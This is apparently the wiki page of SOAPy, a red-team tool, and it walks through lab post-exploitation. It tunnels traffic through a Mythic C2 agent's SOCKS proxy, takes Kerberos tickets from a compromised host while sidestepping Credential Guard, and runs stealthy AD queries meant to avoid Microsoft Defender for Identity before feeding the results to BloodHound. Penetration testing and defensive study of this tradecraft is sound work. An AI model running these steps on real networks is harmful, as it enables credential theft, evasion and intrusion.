-
Notifications
You must be signed in to change notification settings - Fork 41
Recon
The supported method of collecting Active Directory data using SOAPy is to gather data through a SOCKS5 proxy started on a C2 agent into the target environment. When obtaining execution of a C2 agent on a workstation running as a low-privilege user in Active Directory, it is possible to use a post-exploitation utility to stealthily extract Kerberos tickets even with Credential Guard currently enabled on the compromised host. These Kerberos tickets can then be used to proxy ADWS traffic over the agent SOCKS5 proxy into the environment. This technique enables an operator to land on a compromised host, then without plaintext credentials perform stealthy opsec-safe AD collection without executing recon tradecraft on host through a C2 channel.
SOAPy can utilize constrained queries over ADWS to identify potentially vulnerable assets without alerting identity-oriented defensive platforms such as Microsoft Defender for Identity (MDI). This data retrieved from AD can be transformed to BloodHound compatible JSON using Matt Creel's BOFHound and uploaded to BloodHound for attack path visualization and post-processing. All examples will be using the Mythic C2 Agent Apollo
After achieving execution on a remote host within the target environment, start a SOCKS5 proxy through Mythic.
[Sun May 10 2026 06:07 PM] > socks -Action start -Port 7010
Started SOCKS5 server on port 7010
Updating Sleep to 0
To proxy data through the agent using proxychains4, the /etc/proxychains4.conf file will need to be modified. Modify the last line to use the socks5 protocol and to route through the Mythic teamserver on the dedicated port opened for the proxy.
┌──(kali㉿LG-kali)-[~]
└─$ sudo vim /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
socks5 127.0.0.1 7010
Extract Kerberos tickets from the current session. For best opsec, use a BOF which requests the ticket over RPC instead of accessing LSASS memory. If Credential Guard is enabled, dump a service ticket for LDAP since Credential Guard only protects TGT's.
CLIENT SERVICE LUID END
------ ------- ---- ---
| domainuser@LUDUS.DOMAIN | krbtgt/LUDUS.DOMAIN@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
| domainuser@LUDUS.DOMAIN | HTTP/sccm-mgmt.ludus.domain@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
| domainuser@LUDUS.DOMAIN | LDAP/DC01.ludus.domain/ludus.domain@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
| domainuser@LUDUS.DOMAIN | ldap/dc01.ludus.domain@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
CLIENT SERVICE TICKET
------ ------- ------
| domainuser@LUDUS.DOMAIN | krbtgt/LUDUS.DOMAIN@LUDUS.DOMAIN | doIFnjCCBZqgAwIBBaEDAgEWooI...[snip]... |
Copy the ticket from the teamserver, and base64 decode it on the system being used to execute SOAPy. Once the ticket has been decoded to kirbi format, convert it to ccache format to be used with SOAPy.
┌──(kali㉿LG-kali)-[~]
└─$ echo 'doIFnjCCBZqgAwIBBaEDAgEWooIEoTCCBJ1hggSZMIIElaA...[snip]...ET01BSU4=' | base64 -d > ticket.kirbi
┌──(kali㉿LG-kali)-[~]
└─$ ticketConverter.py ./ticket.kirbi ticket.ccache
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
Proxy SOAPy collection through the SOCKS5 proxy running on the Apollo agent using the Kerberos ticket, bypassing the requirement to hold a plaintext password or NT hash for the current user. Any query or action can be run through this proxy, as an example: the query of computer accounts in AD is used. Constrained queries are recommended for opsec purposes, see the operational blog here for more information.
┌──(kali㉿LG-kali)-[~]
└─$ KRB5CCNAME=ticket.ccache proxychains4 SOAPy -k ludus.domain/'domainuser'@dc01.ludus.domain -q '(objectclass=computer)' | tee data/computers.log
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
███████╗ ██████╗ █████╗ ██████╗ ██╗ ██╗
██╔════╝██╔═══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
███████╗██║ ██║███████║██████╔╝ ╚████╔╝
╚════██║██║ ██║██╔══██║██╔═══╝ ╚██╔╝
███████║╚██████╔╝██║ ██║██║ ██║
╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝
v1.0.0
@_logangoins
github.com/jlevere
[*] Connecting to dc01.ludus.domain for resource:Enumeration
[proxychains] Strict chain ... 127.0.0.1:7010 ... dc01.ludus.domain:9389 ... OK
[proxychains] Strict chain ... 127.0.0.1:7010 ... dc01.ludus.domain:88 ... OK
[*] Using query: (objectclass=computer)
[*] Using distingushedName: DC=ludus,DC=domain
--------------------
rIDSetReferences: CN=RID Set,CN=DC01,OU=Domain Controllers,DC=ludus,DC=domain
logonCount: 1229
codePage: 0
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=ludus,DC=domain
msDFSR-ComputerReferenceBL: CN=DC01,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=ludus,DC=domain
isCriticalSystemObject: TRUE
operatingSystem: Windows Server 2022 Standard Evaluation
localPolicyFlags: 0
instanceType: 4
nTSecurityDescriptor: AQAEjBAJAAAsCQAAAAAAABQAAAAEAPwILgAAAAUASAAgAAAAAwAAABAgIF+ledARkCAAwE/C1M+Gepa/5g3QEaKFAKoAMEniAQUAAAAAAAUVAAAAwT4rtvtVUeMDdzCgAAIAAAUASAAgAAAAAwAAAFB5lr/mDdARooUAqgAwSeKGepa...[snip]...
Once this data has been saved, Matt Creel’s BOFHound project can be used to transform it to BloodHound compatible data which can then be uploaded to BloodHound for attack path discovery. Data can be collected over time, making it less likely to be detected while gathering data.
┌──(kali㉿LG-kali)-[~]
└─$ bofhound -i data --zip
_____________________________ __ __ ______ __ __ __ __ _______
| _ / / __ / | ____/| | | | / __ \ | | | | | \ | | | \
| |_) | | | | | | |__ | |__| | | | | | | | | | | \| | | .--. |
| _ < | | | | | __| | __ | | | | | | | | | | . ` | | | | |
| |_) | | `--' | | | | | | | | `--' | | `--' | | |\ | | '--' |
|______/ \______/ |__| |__| |___\_\________\_\________\|__| \___\|_________\
<< @coffeegist | @Tw1sm >>
[19:31:15] INFO Parsed 13 LDAP objects
...[snip]...
[19:31:15] INFO Parsed 99 ACL relationships
[19:31:15] INFO Created default users
[19:31:15] INFO Created default groups
[19:31:15] INFO Resolved group memberships
[19:31:15] INFO Resolved delegation relationships
[19:31:15] INFO Resolved OU memberships
[19:31:15] INFO Linked GPOs to OUs
[19:31:15] INFO Assigned IP addresses to computers
[19:31:15] INFO JSON files written to current directory
[19:31:15] INFO Files compressed into bloodhound_20260510_193115.zip